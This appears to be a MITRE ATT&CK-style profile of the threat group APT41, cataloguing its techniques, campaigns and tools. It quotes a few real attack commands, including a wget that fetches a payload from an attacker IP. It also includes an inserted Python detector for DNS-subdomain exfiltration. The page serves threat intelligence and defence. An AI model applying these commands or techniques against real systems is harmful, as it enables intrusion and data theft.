APT41

APT41 is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to the healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.[1] Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[2][3]

ID: G0096
Associated Groups: Wicked Panda, Brass Typhoon, BARIUM
Contributors: Kyaw Pyiyt Htet, @KyawPyiytHtet; Nikita Rostovcev, Group-IB
Version: 4.1
Created: 23 September 2019
Last Modified: 22 April 2025

Associated Group Descriptions

Name Description
Wicked Panda [4]
Brass Typhoon [5]
BARIUM [5]

Campaigns

ID Name First Seen Last Seen References Techniques
C0040 APT41 DUST  First Seen: January 2023 [6]  Last Seen: June 2024 [6]

APT41 DUST was conducted by APT41 from 2023 to July 2024.[6]

Techniques: Data from Information Repositories, Masquerading: Masquerade Task or Service, Create or Modify System Process: Windows Service, Encrypted Channel: Asymmetric Cryptography, Hijack Execution Flow: DLL Search Order Hijacking, Hijack Execution Flow: DLL Side-Loading, Application Layer Protocol: Web Protocols, Archive Collected Data: Archive via Utility, Search Victim-Owned Websites, Search Open Technical Databases: Scan Databases, Search Open Websites/Domains: Search Engines, Data Staged: Local Data Staging, Server Software Component: Web Shell, Obfuscated Files or Information: Encrypted/Encoded File, Indicator Removal: File Deletion, System Services: Service Execution, Web Service, Automated Collection, Acquire Infrastructure: Serverless, Obtain Capabilities: Code Signing Certificates, Compromise Accounts: Cloud Accounts, Ingress Tool Transfer, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Subvert Trust Controls: Code Signing

C0017 C0017  First Seen: May 2021 [7]  Last Seen: February 2022 [7]

[7]

Techniques: Data from Local System, Proxy, Masquerading: Masquerade Task or Service, Masquerading: Match Legitimate Name or Location, Exploit Public-Facing Application, Hijack Execution Flow, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, Archive Collected Data: Archive via Custom Method, OS Credential Dumping: Security Account Manager, Data Staged: Local Data Staging, Data Obfuscation: Protocol or Service Impersonation, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Server Software Component: Web Shell, Obfuscated Files or Information: Software Packing, Obfuscated Files or Information, System Information Discovery, System Owner/User Discovery, System Network Configuration Discovery, Web Service: Dead Drop Resolver, Web Service, Obtain Capabilities: Tool, Access Token Manipulation, Ingress Tool Transfer, Exfiltration Over C2 Channel, Exfiltration Over Web Service, Scheduled Task/Job: Scheduled Task

Techniques Used

Domain ID Name Use
Enterprise T1197 BITS Jobs

APT41 used BITSAdmin to download and install payloads.[8][4]

Enterprise T1014 Rootkit

APT41 deployed rootkits on Linux systems.[2][4]

Enterprise T1047 Windows Management Instrumentation

APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.[2][3] APT41 has executed files through Windows Management Instrumentation (WMI).[9]

Enterprise T1595 .002 Active Scanning: Vulnerability Scanning

APT41 used the Acunetix SQL injection vulnerability scanner in target reconnaissance operations, as well as the JexBoss tool to identify vulnerabilities in Java applications.[10]

.003 Active Scanning: Wordlist Scanning

APT41 leverages various tools and frameworks to brute-force directories on web servers.[10]

Enterprise T1546 .008 Event Triggered Execution: Accessibility Features

APT41 leveraged sticky keys to establish persistence.[2]

Enterprise T1213 .003 Data from Information Repositories: Code Repositories

APT41 cloned victim user Git repositories during intrusions.[10]

Enterprise T1555 Credentials from Password Stores

APT41 has obtained information about accounts, lists of employees, and plaintext and hashed passwords from databases.[10]

.003 Credentials from Password Stores: Credentials from Web Browsers

APT41 used BrowserGhost, a tool designed to obtain credentials from browsers, to retrieve information from password stores.[10]

Enterprise T1005 Data from Local System

APT41 has uploaded files and data from a compromised host.[3]

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.[7]

Enterprise T1090 Proxy

APT41 used a tool called CLASSFON to covertly proxy network communications.[2]

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.[7]

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

APT41 has created services to appear as benign system tools.[3]

APT41 DUST disguised DUSTPAN as a legitimate Windows binary such as w3wp.exe or conn.exe.[6]

During C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious code.[7]

.005 Masquerading: Match Legitimate Name or Location

APT41 attempted to masquerade their files as popular anti-virus software.[2][3]

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx, likely to avoid hunting detections.[7]

Enterprise T1656 Impersonation

APT41 impersonated an employee at a video game developer company to send phishing emails.[1]

Enterprise T1550 .002 Use Alternate Authentication Material: Pass the Hash

APT41 uses tools such as Mimikatz to enable lateral movement via captured password hashes.[10]

Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.[2]

Enterprise T1112 Modify Registry

APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.[2][3]

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT41 modified legitimate Windows services to install malware backdoors.[2][3] APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.[8]

APT41 DUST used Windows Services with names such as Windows Defend for persistence of DUSTPAN.[6]

Enterprise T1136 .001 Create Account: Local Account

APT41 has created user accounts.[2]

Enterprise T1190 Exploit Public-Facing Application

APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central through unsafe deserialization, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.[8] APT41 leveraged vulnerabilities such as ProxyLogon exploitation or SQL injection for initial access.[10] APT41 exploited CVE-2021-26855 against a vulnerable Microsoft Exchange Server to gain initial access to the victim network.[9]

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.[7]

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

APT41 DUST used HTTPS for command and control.[6]

Enterprise T1568 .002 Dynamic Resolution: Domain Generation Algorithms

APT41 has used DGAs to change their C2 servers monthly.[2]

Enterprise T1574 .001 Hijack Execution Flow: DLL Search Order Hijacking

APT41 has used search order hijacking to execute malicious payloads, such as Winnti for Windows.[4]

APT41 DUST involved the use of DLL search order hijacking to execute DUSTTRAP.[6]

.002 Hijack Execution Flow: DLL Side-Loading

APT41 used legitimate executables to perform DLL side-loading of their malware.[2]

APT41 DUST used DLL side-loading to execute DUSTTRAP via an AhnLab uninstaller.[6]

.006 Hijack Execution Flow: Dynamic Linker Hijacking

APT41 has configured payloads to load via LD_PRELOAD.[4]

Enterprise T1140 Deobfuscate/Decode Files or Information

During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.[7]

Enterprise T1037 Boot or Logon Initialization Scripts

APT41 used a hidden shell script in /etc/rc.d/init.d to leverage the ADORE.XSEC backdoor and Adore-NG rootkit.[1]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

APT41 created and modified startup files for persistence.[2][3] APT41 added a registry key in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.[8]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT41 leveraged PowerShell to deploy malware families in victims’ environments.[2][8]

.003 Command and Scripting Interpreter: Windows Command Shell

APT41 used cmd.exe /c to execute commands on remote machines.[2] APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.[8]

During C0017, APT41 used cmd.exe to execute reconnaissance commands.[7]

.004 Command and Scripting Interpreter: Unix Shell

APT41 used Linux shell commands for system survey and information gathering prior to exploitation of vulnerabilities such as CVE-2019-19871.[8]

.007 Command and Scripting Interpreter: JavaScript

During C0017, APT41 deployed JScript web shells on compromised systems.[7]

Enterprise T1008 Fallback Channels

APT41 used the Steam community page as a fallback mechanism for C2.[2]

Enterprise T1484 .001 Domain or Tenant Policy Modification: Group Policy Modification

APT41 used scheduled tasks created via Group Policy Objects (GPOs) to deploy ransomware.[1]

Enterprise T1133 External Remote Services

APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.[2]

Enterprise T1104 Multi-Stage Channels

APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.[8]

Enterprise T1562 .006 Impair Defenses: Indicator Blocking

APT41 developed a custom injector that enables an Event Tracing for Windows (ETW) bypass, making malicious processes invisible to Windows logging.[10]

Enterprise T1203 Exploitation for Client Execution

APT41 leveraged the following exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[2]

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.[8]

APT41 DUST used HTTPS for command and control.[6]

During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads.[7]

.002 Application Layer Protocol: File Transfer Protocols

APT41 used exploit payloads that initiate download via ftp.[8]

.004 Application Layer Protocol: DNS

APT41 used DNS for C2 communications.[2][3]

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

APT41 created a RAR archive of targeted files for exfiltration.[2] Additionally, APT41 used the makecab.exe utility both to download tools, such as NATBypass, to the victim network and to archive a file for exfiltration.[9]

APT41 DUST used rar to compress data downloaded from internal Oracle databases prior to exfiltration.[6]

.003 Archive Collected Data: Archive via Custom Method

During C0017, APT41 hex-encoded PII data prior to exfiltration.[7]

Enterprise T1480 .001 Execution Guardrails: Environmental Keying

APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.[11]

Enterprise T1594 Search Victim-Owned Websites

APT41 DUST involved access of external victim websites for target development.[6]

Enterprise T1596 .005 Search Open Technical Databases: Scan Databases

APT41 uses the Chinese website fofa.su, similar to the Shodan scanning service, for passive scanning of victims.[10]

APT41 DUST used internet scan data for target development.[6]

Enterprise T1593 .002 Search Open Websites/Domains: Search Engines

APT41 DUST involved use of search engines to research victim servers.[6]

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

APT41 has used hashdump, Mimikatz, Procdump, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.[2][3][9]

.002 OS Credential Dumping: Security Account Manager

APT41 extracted user account data from the Security Account Manager (SAM), making a copy of this database from the registry using the reg save command or by exploiting volume shadow copies.[10]

During C0017, APT41 copied the SAM and SYSTEM Registry hives for credential harvesting.[7]

.003 OS Credential Dumping: NTDS

APT41 used ntdsutil to obtain a copy of the victim environment ntds.dit file.[10]

Enterprise T1030 Data Transfer Size Limits

APT41 transfers post-exploitation files by dividing the payload into fixed-size chunks to evade detection.[10]

Enterprise T1074 .001 Data Staged: Local Data Staging

APT41 DUST involved exporting data from Oracle databases to local CSV files prior to exfiltration.[6]

During C0017, APT41 copied the local SAM and SYSTEM Registry hives to a staging directory.[7]

Enterprise T1486 Data Encrypted for Impact

APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.[2] APT41 also used Microsoft BitLocker to encrypt workstations and Jetico’s BestCrypt to encrypt servers.[9]

Enterprise T1001 .003 Data Obfuscation: Protocol or Service Impersonation

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.[7]

Enterprise T1083 File and Directory Discovery

APT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related information.[8]

Enterprise T1110 Brute Force

APT41 performed password brute-force attacks on the local admin account.[2]

Enterprise T1048 .003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.[7]
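As an added defensive illustration of the DNS exfiltration pattern described above (this is not code from the page or from any cited report), the following Python script scans a constructed resolver log for query names whose subdomain labels look like hex-encoded data prepended to a shared parent domain, then decodes the flagged labels for triage. The log format, the client IP and the parent domain files-cdn.example.net are assumptions.

```python
"""Heuristic detection of DNS exfiltration: data encoded and prepended as
subdomain labels to an attacker-controlled parent domain (added example)."""
import math
import re
from collections import defaultdict

# Constructed sample resolver log, one query per line:
# "<timestamp> <client_ip> <qtype> <qname>". The client IP and the parent
# domain files-cdn.example.net are placeholders, not indicators from the page.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 A www.example.com
2024-05-01T10:00:01Z 10.0.0.5 AAAA www.example.com
2024-05-01T10:00:02Z 10.0.0.5 A 0001.6e616d653d4a6f686e20446f65.files-cdn.example.net
2024-05-01T10:00:02Z 10.0.0.5 A 0002.646f623d313938302d30312d3032.files-cdn.example.net
2024-05-01T10:00:03Z 10.0.0.5 A 0003.69643d4131323334353637.files-cdn.example.net
2024-05-01T10:00:04Z 10.0.0.5 A mail.example.com
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
# A label made only of lowercase hex digits and at least 16 characters long
# is treated as a candidate for encoded data.
HEX_LABEL_RE = re.compile(r"^[0-9a-f]{16,}$")


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; encoded data scores higher than words
    or repeated padding such as '0000000000000000'."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str, parent_labels: int = 2):
    """Split a query name into (subdomain labels, parent domain).
    Treating the last two labels as the parent is a simplification; a public
    suffix list would be needed for names such as example.co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-parent_labels], ".".join(labels[-parent_labels:])


def analyze_dns_log(log_text: str, min_hex_labels: int = 3,
                    min_entropy: float = 2.0):
    """Group queries by (client, parent domain) and flag pairs that carry
    enough hex-like, non-trivial labels to suggest encoded data in transit.
    Returns {(client, parent): {"queries", "hex_labels", "decoded_preview"}}."""
    stats = defaultdict(lambda: {"queries": 0, "hex_labels": [], "decoded": b""})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank or malformed line
        _ts, client, _qtype, qname = m.groups()
        prefix, parent = split_qname(qname)
        entry = stats[(client, parent)]
        entry["queries"] += 1
        for label in prefix:
            if HEX_LABEL_RE.match(label) and shannon_entropy(label) >= min_entropy:
                entry["hex_labels"].append(label)
                entry["decoded"] += bytes.fromhex(label)  # for analyst triage
    findings = {}
    for key, entry in stats.items():
        if len(entry["hex_labels"]) >= min_hex_labels:
            findings[key] = {
                "queries": entry["queries"],
                "hex_labels": entry["hex_labels"],
                # latin-1 never fails, so binary payloads still yield a preview
                "decoded_preview": entry["decoded"].decode("latin-1"),
            }
    return findings


if __name__ == "__main__":
    for (client, parent), f in analyze_dns_log(SAMPLE_DNS_LOG).items():
        print(f"{client} -> {parent}: {f['queries']} queries, "
              f"{len(f['hex_labels'])} encoded labels; "
              f"preview: {f['decoded_preview']!r}")
```

On real resolver logs the thresholds should be tuned per environment, since CDNs and some security products also emit long hex-like labels legitimately.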

Enterprise T1078 Valid Accounts

APT41 used compromised credentials to log on to other systems.[2][4]

Enterprise T1505 .003 Server Software Component: Web Shell

APT41 DUST involved use of web shells such as ANTSWORD and BLUEBEAM for persistence.[6]

During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.[7]

Enterprise T1069 Permission Groups Discovery

APT41 used net group commands to enumerate various Windows user groups and permissions.[10]

Enterprise T1012 Query Registry

APT41 queried registry values to determine items such as configured RDP ports and network configurations.[10]

Enterprise T1570 Lateral Tool Transfer

APT41 uses remote shares to move and remotely execute payloads during lateral movement.[10]

Enterprise T1027 Obfuscated Files or Information

APT41 used VMProtected binaries in multiple intrusions.[8]

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.[7]

.002 Obfuscated Files or Information: Software Packing

APT41 uses packers such as Themida to obfuscate malicious files.[10]

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.[7]

.013 Obfuscated Files or Information: Encrypted/Encoded File

APT41 DUST used encrypted payloads decrypted and executed in memory.[6]

Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.[2]

.003 Indicator Removal: Clear Command History

APT41 attempted to remove evidence of some of its activity by deleting Bash histories.[2]

.004 Indicator Removal: File Deletion

APT41 deleted files from the system.[2][10]

APT41 DUST deleted various artifacts from victim systems following use.[6]

Enterprise T1218 .001 System Binary Proxy Execution: Compiled HTML File

APT41 used compiled HTML (.chm) files for targeting.[2]

.011 System Binary Proxy Execution: Rundll32

APT41 has used rundll32.exe to execute a loader.[4]

Enterprise T1082 System Information Discovery

APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information.[10]

During C0017, APT41 issued ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+ commands to find the volume serial number of compromised systems.[7]

Enterprise T1033 System Owner/User Discovery

APT41 has executed whoami commands, including using the WMIEXEC utility to execute this on remote machines.[2][10]

During C0017, APT41 used whoami to gather information from victim machines.[7]

Enterprise T1569 .002 System Services: Service Execution

APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.[8][3]

APT41 DUST used Windows services to execute DUSTPAN.[6]

Enterprise T1049 System Network Connections Discovery

APT41 has enumerated IP addresses of network resources and used the netstat command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.[2][3]

Enterprise T1016 System Network Configuration Discovery

APT41 collected MAC addresses from victim machines.[2][3]

During C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.[7]

Enterprise T1135 Network Share Discovery

APT41 used the net share command as part of network reconnaissance.[2][3]

Enterprise T1102 .001 Web Service: Dead Drop Resolver

APT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.[2]

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably, APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.[7]

Enterprise T1046 Network Service Discovery

APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets.[2]

Enterprise T1599 Network Boundary Bridging

APT41 used NATBypass to bypass firewall restrictions and to access compromised systems via RDP.[9]

Enterprise T1119 Automated Collection

APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information.[6]

Enterprise T1583 .007 Acquire Infrastructure: Serverless

APT41 DUST used infrastructure hosted behind Cloudflare or utilized Cloudflare Workers for command and control.[6]

Enterprise T1588 .002 Obtain Capabilities: Tool

APT41 has obtained and used tools such as Mimikatz, pwdump, PowerSploit, and Windows Credential Editor.[2]

For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.[7]

.003 Obtain Capabilities: Code Signing Certificates

APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and components.[6]

Enterprise T1134 Access Token Manipulation

During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.[7]

Enterprise T1087 .001 Account Discovery: Local Account

APT41 used built-in net commands to enumerate local administrator groups.[10]

.002 Account Discovery: Domain Account

APT41 used built-in net commands to enumerate domain administrator users.[10]

Enterprise T1586 .003 Compromise Accounts: Cloud Accounts

APT41 DUST used compromised Google Workspace accounts for command and control.[6]

Enterprise T1098 .007 Account Manipulation: Additional Local or Domain Groups

APT41 has added user accounts to the User and Admin groups.[2]

Enterprise T1496 .001 Resource Hijacking: Compute Hijacking

APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment.[2][1]

Enterprise T1105 Ingress Tool Transfer

APT41 used certutil to download additional files.[8][4][3] APT41 downloaded post-exploitation tools such as Cobalt Strike via command shell following initial access.[10] APT41 has uploaded Procdump and NATBypass to a staging directory and has used these tools in follow-on activities.[9]

APT41 DUST involved execution of certutil.exe via web shell to download the DUSTPAN dropper.[6]

During C0017, APT41 downloaded malicious payloads onto compromised systems.[7]

Enterprise T1056 .001 Input Capture: Keylogging

APT41 used a keylogger called GEARSHIFT on a target system.[2]

Enterprise T1055 Process Injection

APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.[2]

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

APT41 used RDP for lateral movement.[2][4] APT41 used NATBypass to expose local RDP ports on compromised systems to the Internet.[9]

.002 Remote Services: SMB/Windows Admin Shares

APT41 has transferred implant files using Windows Admin Shares and the Server Message Block (SMB) protocol, then executed the files through Windows Management Instrumentation (WMI).[4][9]

Enterprise T1018 Remote System Discovery

APT41 has used MiPing to discover active systems in the victim network.[9]

Enterprise T1041 Exfiltration Over C2 Channel

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.[7]

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

APT41 DUST exfiltrated collected information to OneDrive.[6]

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.[2]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

APT41 used a compromised account to create a scheduled task on a system.[2][4]

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: \Microsoft\Windows\PLA\Server Manager Performance Monitor, \Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults, and \Microsoft\Windows\WDI\USOShared.[7]

Enterprise T1542 .003 Pre-OS Boot: Bootkit

APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.[2]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

APT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.[2][3]

APT41 DUST used stolen code signing certificates for DUSTTRAP malware and subsequent payloads.[6]

Software

ID Name References Techniques
S0073 ASPXSpy [2] Server Software Component: Web Shell
S0190 BITSAdmin [8] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Lateral Tool Transfer, Ingress Tool Transfer
S0069 BLACKCOFFEE [2] Command and Scripting Interpreter: Windows Command Shell, Multi-Stage Channels, File and Directory Discovery, Indicator Removal: File Deletion, Web Service: Dead Drop Resolver, Web Service: Bidirectional Communication, Process Discovery
S0160 certutil [8] Deobfuscate/Decode Files or Information, Archive Collected Data: Archive via Utility, Ingress Tool Transfer, Subvert Trust Controls: Install Root Certificate
S0020 China Chopper APT41 used the China Chopper web shell as a persistence mechanism on compromised Microsoft Exchange servers.[9][2] Data from Local System, Command and Scripting Interpreter: Windows Command Shell, Application Layer Protocol: Web Protocols, File and Directory Discovery, Brute Force: Password Guessing, Server Software Component: Web Shell, Obfuscated Files or Information: Software Packing, Indicator Removal: Timestomp, Network Service Discovery, Ingress Tool Transfer
S0154 Cobalt Strike [8][3] BITS Jobs, Windows Management Instrumentation, Data from Local System, Proxy: Domain Fronting, Proxy: Internal Proxy, Use Alternate Authentication Material: Pass the Hash, Modify Registry, Create or Modify System Process: Windows Service, Office Application Startup: Office Template Macros, Encrypted Channel: Asymmetric Cryptography, Encrypted Channel: Symmetric Cryptography, Protocol Tunneling, Reflective Code Loading, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: JavaScript, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Python, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify Tools, Exploitation for Client Execution, Screen Capture, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, Data Transfer Size Limits, Data Obfuscation: Protocol or Service Impersonation, Data Encoding: Standard Encoding, File and Directory Discovery, Valid Accounts: Domain Accounts, Valid Accounts: Local Accounts, Native API, Exploitation for Privilege Escalation, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Query Registry, Browser Session Hijacking, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information, Abuse Elevation Control Mechanism: Sudo and Sudo Caching, Abuse Elevation Control Mechanism: Bypass User Account Control, Indicator Removal: Timestomp, System Binary Proxy Execution: Rundll32, System Services: Service Execution, System Service Discovery, System Network Connections Discovery, System Network Configuration Discovery, Network Share Discovery, Network Service Discovery, Access Token Manipulation: Parent PID Spoofing, Access Token Manipulation: Token Impersonation/Theft, Access Token Manipulation: Make and Impersonate Token, Account Discovery: Domain Account, Software Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Process Injection: Dynamic-link Library Injection, Process Injection: Process Hollowing, Process Injection, Remote Services: Remote Desktop Protocol, Remote Services: SSH, Remote Services: Windows Remote Management, Remote Services: SMB/Windows Admin Shares, Remote Services: Distributed Component Object Model, Remote System Discovery, Hide Artifacts: Process Argument Spoofing, Non-Application Layer Protocol, Scheduled Transfer, Subvert Trust Controls: Code Signing
S1052 DEADEYE [7] Masquerading: Masquerade Task or Service, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Windows Command Shell, Execution Guardrails, Native API, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Embedded Payloads, System Binary Proxy Execution: Msiexec, System Binary Proxy Execution: Rundll32, System Information Discovery, System Network Configuration Discovery, Hide Artifacts: NTFS File Attributes, Scheduled Task/Job
S0021 Derusbi [2] Encrypted Channel: Symmetric Cryptography, Command and Scripting Interpreter: Unix Shell, Fallback Channels, Screen Capture, File and Directory Discovery, Query Registry, Indicator Removal: Timestomp, Indicator Removal: File Deletion, System Binary Proxy Execution: Regsvr32, System Information Discovery, System Owner/User Discovery, Video Capture, Input Capture: Keylogging, Process Discovery, Process Injection: Dynamic-link Library Injection, Non-Application Layer Protocol, Non-Standard Port, Audio Capture
S0105 dsquery [7] Domain Trust Discovery, Permission Groups Discovery: Domain Groups, System Information Discovery, Account Discovery: Domain Account
S1158 DUSTPAN DUSTPAN has been used by APT41 in various campaigns since at least 2021.[12][6] Masquerading: Match Legitimate Name or Location, Create or Modify System Process: Windows Service, Deobfuscate/Decode Files or Information, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Embedded Payloads, Process Injection: Portable Executable Injection
S1159 DUSTTRAP DUSTTRAP is used by APT41.[6] Data from Local System, Deobfuscate/Decode Files or Information, Command and Scripting Interpreter: Windows Command Shell, Domain Trust Discovery, Screen Capture, Application Window Discovery, File and Directory Discovery, Log Enumeration, Query Registry, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Embedded Payloads, Indicator Removal, Indicator Removal: Clear Windows Event Logs, Indicator Removal: Network Share Connection Removal, System Information Discovery, System Time Discovery, System Network Configuration Discovery, Group Policy Discovery, Network Share Discovery, Virtualization/Sandbox Evasion: System Checks, Account Discovery: Domain Account, Account Discovery: Local Account, Software Discovery: Security Software Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Process Injection, Remote System Discovery, Exfiltration Over C2 Channel
S0363 Empire [4] Windows Management Instrumentation, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Event Triggered Execution: Accessibility Features, Credentials from Password Stores: Credentials from Web Browsers, Use Alternate Authentication Material: Pass the Hash, Create or Modify System Process: Windows Service, Create Account: Local Account, Create Account: Domain Account, Clipboard Data, Encrypted Channel: Asymmetric Cryptography, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: Path Interception by Search Order Hijacking, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Dylib Hijacking, Hijack Execution Flow: DLL Search Order Hijacking, Trusted Developer Utilities Proxy Execution: MSBuild, Boot or Logon Autostart Execution: Security Support Provider, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Shortcut Modification, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter, Domain Trust Discovery, Domain or Tenant Policy Modification: Group Policy Modification, Screen Capture, Application Layer Protocol: Web Protocols, Archive Collected Data, OS Credential Dumping: LSASS Memory, File and Directory Discovery, Unsecured Credentials: Credentials In Files, Unsecured Credentials: Private Keys, Native API, Exploitation for Privilege Escalation, Browser Information Discovery, Obfuscated Files or Information: Command Obfuscation, Abuse Elevation Control Mechanism: Bypass User Account Control, Email Collection: Local Email Collection, Indicator Removal: Timestomp, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, System Information Discovery, System Owner/User Discovery, System Services: Service Execution, System Network Connections Discovery, System Network Configuration Discovery, Group Policy Discovery, Network Share Discovery, Network Sniffing, Web Service: Bidirectional Communication, Network Service Discovery, Automated Collection, Automated Exfiltration, Video Capture, Access Token Manipulation: SID-History Injection, Access Token Manipulation, Access Token Manipulation: Create Process with Token, Account Discovery: Domain Account, Account Discovery: Local Account, Software Discovery: Security Software Discovery, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture: Credential API Hooking, Process Discovery, Process Injection, Remote Services: Distributed Component Object Model, Remote Services: SSH, Exploitation of Remote Services, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Code Repository, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Scheduled Task/Job: Scheduled Task
